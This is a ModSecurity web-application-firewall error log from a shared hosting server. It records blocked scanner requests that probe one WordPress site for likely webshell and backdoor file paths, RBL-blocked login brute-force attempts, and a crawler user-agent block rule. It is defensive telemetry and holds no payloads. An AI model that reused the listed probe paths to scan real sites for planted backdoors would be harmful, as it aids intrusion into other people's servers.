[Tue May 26 20:03:55.963024 2026] [security2:error] [pid 112029:tid 112236] [client 103.163.220.19:50351] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/news-portal/admins-dir.php"] [unique_id "ahWvU6FW0C-ajaCsyFdD5QAAAVc"]
[Tue May 26 20:03:56.483292 2026] [security2:error] [pid 113091:tid 113346] [client 103.163.220.44:61241] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/ID3/module.tag.lyrics3-class.php"] [unique_id "ahWvVKPxBGSmlFNOy6pL6wAAApE"]
[Tue May 26 20:03:56.855661 2026] [security2:error] [pid 113091:tid 113294] [client 209.251.16.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWvVKPxBGSmlFNOy6pL9AAAAl0"], referer: https://anujtradingco.com
[Tue May 26 20:03:56.915162 2026] [security2:error] [pid 113091:tid 113333] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvVKPxBGSmlFNOy6pL6QAAAoQ"]
[Tue May 26 20:03:56.983296 2026] [security2:error] [pid 112029:tid 112188] [client 103.163.220.34:25445] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/network/theme-install-variable.php"] [unique_id "ahWvVKFW0C-ajaCsyFdD6wAAASc"]
[Tue May 26 20:03:57.485482 2026] [security2:error] [pid 113091:tid 113291] [client 103.163.220.29:55979] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/post-excerpt/themes/"] [unique_id "ahWvVaPxBGSmlFNOy6pMBwAAAlo"]
[Tue May 26 20:03:57.971738 2026] [security2:error] [pid 106517:tid 106746] [client 103.163.220.6:29463] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/dt-the7/lib/jquery-sticky/theme-compat/"] [unique_id "ahWvVYZZc2DoU1lPnP2DHQAAAOQ"]
[Tue May 26 20:03:58.213728 2026] [security2:error] [pid 106517:tid 106708] [client 192.42.116.93:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvVoZZc2DoU1lPnP2DIAAAvmw"], referer: https://kingsclub.in/outdoor-swimming-pool
[Tue May 26 20:03:58.466857 2026] [security2:error] [pid 113091:tid 113306] [client 103.163.220.54:51775] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/user/upgrade/"] [unique_id "ahWvVqPxBGSmlFNOy6pMFwAAAmk"]
[Tue May 26 20:03:58.784867 2026] [security2:error] [pid 113091:tid 113242] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvVqPxBGSmlFNOy6pMFgAAAik"]
[Tue May 26 20:03:58.842069 2026] [security2:error] [pid 106517:tid 106704] [client 66.249.64.34:55531] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvVYZZc2DoU1lPnP2DGwAAALo"], referer: https://mosykay.com/prizes/242392127
[Tue May 26 20:03:58.970590 2026] [security2:error] [pid 113091:tid 113292] [client 103.163.220.11:24923] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/customize/pki-validation/"] [unique_id "ahWvVqPxBGSmlFNOy6pMIwAAAls"]
[Tue May 26 20:03:59.467619 2026] [security2:error] [pid 113091:tid 113320] [client 103.163.220.14:52041] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/backups/admin.php"] [unique_id "ahWvV6PxBGSmlFNOy6pMMwAAAnc"]
[Tue May 26 20:03:59.969320 2026] [security2:error] [pid 113091:tid 113232] [client 103.125.146.81:37747] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentytwentytwo/admin.php"] [unique_id "ahWvV6PxBGSmlFNOy6pMPwAAAh8"]
[Tue May 26 20:04:00.483461 2026] [security2:error] [pid 112029:tid 112184] [client 103.163.220.44:40545] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentytwentytwo/"] [unique_id "ahWvWKFW0C-ajaCsyFdD9AAAASM"]
[Tue May 26 20:04:00.510013 2026] [security2:error] [pid 113091:tid 113165] [remote 121.200.216.55:59246] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvWKPxBGSmlFNOy6pMRAAChUk"]
[Tue May 26 20:04:01.072464 2026] [security2:error] [pid 106517:tid 106700] [client 103.163.220.33:46135] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins-off/core.php"] [unique_id "ahWvWYZZc2DoU1lPnP2DeAAAALY"]
[Tue May 26 20:04:01.319403 2026] [security2:error] [pid 113091:tid 113310] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvWKPxBGSmlFNOy6pMSQAAAm0"]
[Tue May 26 20:04:01.579826 2026] [security2:error] [pid 106517:tid 106733] [client 103.163.220.29:63445] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/my-custom-theme/config.php"] [unique_id "ahWvWYZZc2DoU1lPnP2DhgAAANc"]
[Tue May 26 20:04:01.881437 2026] [security2:error] [pid 106517:tid 106526] [remote 178.104.164.71:42152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvWYZZc2DoU1lPnP2DjQAAoAY"]
[Tue May 26 20:04:02.068217 2026] [security2:error] [pid 106517:tid 106740] [client 103.163.220.30:58327] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/theme/config.php"] [unique_id "ahWvWoZZc2DoU1lPnP2DngAAAN4"]
[Tue May 26 20:04:02.155436 2026] [security2:error] [pid 113091:tid 113171] [remote 198.38.81.14:32798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 14.81.38.198.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvWaPxBGSmlFNOy6pMTgACY08"]
[Tue May 26 20:04:02.565799 2026] [security2:error] [pid 112029:tid 112268] [client 103.163.220.47:40483] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/my-custom-theme/admin.php"] [unique_id "ahWvWqFW0C-ajaCsyFdD_gAAAXc"]
[Tue May 26 20:04:03.070139 2026] [security2:error] [pid 106517:tid 106700] [client 103.163.220.47:38007] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/maxcoach/"] [unique_id "ahWvW4ZZc2DoU1lPnP2DuQAAALY"]
[Tue May 26 20:04:03.205799 2026] [security2:error] [pid 113091:tid 113170] [remote 64.225.121.94:56630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 94.121.225.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWvW6PxBGSmlFNOy6pMXAACKU4"]
[Tue May 26 20:04:03.588277 2026] [security2:error] [pid 113091:tid 113275] [client 103.163.220.36:49955] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/min.php"] [unique_id "ahWvW6PxBGSmlFNOy6pMYgAAAko"]
[Tue May 26 20:04:04.084945 2026] [security2:error] [pid 106517:tid 106712] [client 103.163.220.53:55921] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/config.php"] [unique_id "ahWvXIZZc2DoU1lPnP2D5AAAAMI"]
[Tue May 26 20:04:04.575549 2026] [security2:error] [pid 113091:tid 113277] [client 103.163.220.55:55761] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/kqsksia/classwithtostring.php"] [unique_id "ahWvXKPxBGSmlFNOy6pMcAAAAkw"]
[Tue May 26 20:04:04.649717 2026] [security2:error] [pid 106517:tid 106719] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvXIZZc2DoU1lPnP2D6gAAAMk"]
[Tue May 26 20:04:05.113549 2026] [security2:error] [pid 112029:tid 112188] [client 103.163.220.22:20457] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/ID3/man.php"] [unique_id "ahWvXaFW0C-ajaCsyFdEGQAAASc"]
[Tue May 26 20:04:05.672608 2026] [security2:error] [pid 113091:tid 113245] [client 103.125.146.81:55249] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/pullquote/1.php"] [unique_id "ahWvXaPxBGSmlFNOy6pMgwAAAiw"]
[Tue May 26 20:04:06.468057 2026] [security2:error] [pid 106517:tid 106775] [client 103.163.220.32:44497] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/oceanwp/sass/base/1.php"] [unique_id "ahWvXoZZc2DoU1lPnP2EFwAAAQE"]
[Tue May 26 20:04:06.968317 2026] [security2:error] [pid 112029:tid 112195] [client 103.163.220.10:64097] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks-other.php"] [unique_id "ahWvXqFW0C-ajaCsyFdEMAAAAS4"]
[Tue May 26 20:04:07.467926 2026] [security2:error] [pid 106517:tid 106759] [client 103.163.220.34:43129] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/wp-wlx.php"] [unique_id "ahWvX4ZZc2DoU1lPnP2EMwAAAPE"]
[Tue May 26 20:04:07.496571 2026] [security2:error] [pid 106517:tid 106704] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvX4ZZc2DoU1lPnP2ELgAAALo"]
[Tue May 26 20:04:07.826089 2026] [security2:error] [pid 106517:tid 106591] [remote 47.128.23.33:14112] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "blog.jhonweb.com"] [uri "/claves-para-instalar-windows-xp-profesional-sp3/"] [unique_id "ahWvX4ZZc2DoU1lPnP2EQAAA4Ec"]
[Tue May 26 20:04:07.853897 2026] [security2:error] [pid 106517:tid 106588] [remote 47.128.29.159:58094] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "blog.jhonweb.com"] [uri "/claves-para-instalar-windows-xp-profesional-sp3/"] [unique_id "ahWvX4ZZc2DoU1lPnP2EQQAAhkQ"]
[Tue May 26 20:04:07.869070 2026] [security2:error] [pid 112029:tid 112107] [remote 47.128.17.48:28650] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "blog.jhonweb.com"] [uri "/claves-para-instalar-windows-xp-profesional-sp3/"] [unique_id "ahWvX6FW0C-ajaCsyFdEOgABME0"]
[Tue May 26 20:04:07.972678 2026] [security2:error] [pid 113091:tid 113292] [client 103.125.146.81:57373] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/media-upload-double.php"] [unique_id "ahWvX6PxBGSmlFNOy6pMowAAAls"]
[Tue May 26 20:04:08.034210 2026] [security2:error] [pid 106517:tid 106613] [remote 47.128.30.162:41952] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "blog.jhonweb.com"] [uri "/claves-para-instalar-windows-xp-profesional-sp3/"] [unique_id "ahWvYIZZc2DoU1lPnP2ESQAA9V0"]
[Tue May 26 20:04:08.461442 2026] [security2:error] [pid 106517:tid 106775] [client 103.163.220.35:39283] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/includes/class-wp-filesystem-ftpsockets-more.php"] [unique_id "ahWvYIZZc2DoU1lPnP2EWwAAAQE"]
[Tue May 26 20:04:08.984646 2026] [security2:error] [pid 106517:tid 106676] [client 103.163.220.48:39441] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentynineteen/content-"] [unique_id "ahWvYIZZc2DoU1lPnP2EdAAAAJ8"]
[Tue May 26 20:04:09.480424 2026] [security2:error] [pid 113091:tid 113305] [client 103.163.220.22:34955] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/wordpress-seo/"] [unique_id "ahWvYaPxBGSmlFNOy6pMuwAAAmg"]
[Tue May 26 20:04:09.566148 2026] [security2:error] [pid 106517:tid 106658] [client 104.168.67.203:59774] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahWvYYZZc2DoU1lPnP2EdQAAjWQ"], referer: https://blog.jhonweb.com/
[Tue May 26 20:04:09.588810 2026] [security2:error] [pid 106517:tid 106740] [client 111.225.148.221:58702] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "krishnawoodworks.com"] [uri "/robots.txt"] [unique_id "ahWvYYZZc2DoU1lPnP2EfgAAAN4"]
[Tue May 26 20:04:09.769903 2026] [security2:error] [pid 113091:tid 113348] [client 85.208.96.206:11336] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-16-20/day/2023-06-04/"] [unique_id "ahWvYaPxBGSmlFNOy6pMwgAAApM"]
[Tue May 26 20:04:09.770029 2026] [security2:error] [pid 113091:tid 113348] [client 85.208.96.206:11336] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-16-20/day/2023-06-04/"] [unique_id "ahWvYaPxBGSmlFNOy6pMwgAAApM"]
[Tue May 26 20:04:09.914954 2026] [security2:error] [pid 112029:tid 112233] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvYaFW0C-ajaCsyFdESQAAAVQ"]
[Tue May 26 20:04:10.815809 2026] [security2:error] [pid 106517:tid 106770] [client 66.249.64.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWvYoZZc2DoU1lPnP2EswAAAPw"]
[Tue May 26 20:04:10.816114 2026] [security2:error] [pid 106517:tid 106773] [client 66.249.64.110:53854] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWvYoZZc2DoU1lPnP2EpwAAAP8"]
[Tue May 26 20:04:11.529859 2026] [security2:error] [pid 106517:tid 106749] [client 146.174.177.112:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvY4ZZc2DoU1lPnP2EwgAAAOc"]
[Tue May 26 20:04:11.545437 2026] [security2:error] [pid 106517:tid 106563] [remote 45.79.189.31:13522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWvY4ZZc2DoU1lPnP2EywAA7Ss"]
[Tue May 26 20:04:11.551858 2026] [security2:error] [pid 106517:tid 106687] [client 104.192.3.74:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvY4ZZc2DoU1lPnP2EygAAqSY"], referer: https://kingsclub.in/party-and-marriage-hall
[Tue May 26 20:04:12.152667 2026] [security2:error] [pid 112029:tid 112270] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvY6FW0C-ajaCsyFdEVAAAAXk"]
[Tue May 26 20:04:14.100532 2026] [security2:error] [pid 113091:tid 113313] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvZaPxBGSmlFNOy6pNBwAAAnA"]
[Tue May 26 20:04:16.876151 2026] [security2:error] [pid 113091:tid 113222] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvaKPxBGSmlFNOy6pNXQAAAhU"]
[Tue May 26 20:04:17.227201 2026] [security2:error] [pid 106517:tid 106778] [client 70.26.224.236:47554] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahWvaIZZc2DoU1lPnP2FigABBHo"]
[Tue May 26 20:04:19.040223 2026] [security2:error] [pid 113091:tid 113276] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvaqPxBGSmlFNOy6pNgwAAAks"]
[Tue May 26 20:04:19.177302 2026] [security2:error] [pid 112029:tid 112174] [client 45.84.107.222:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvaqFW0C-ajaCsyFdEtwABGX4"], referer: https://kingsclub.in/presidential-lounge
[Tue May 26 20:04:19.548726 2026] [security2:error] [pid 106517:tid 106542] [remote 67.23.237.2:47206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.237.23.67.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWva4ZZc2DoU1lPnP2F2AAA7RY"]
[Tue May 26 20:04:19.912700 2026] [fcgid:warn] [pid 112029:tid 112213] (70014)End of file found: [client 66.132.186.179:59336] mod_fcgid: can't get data from http client
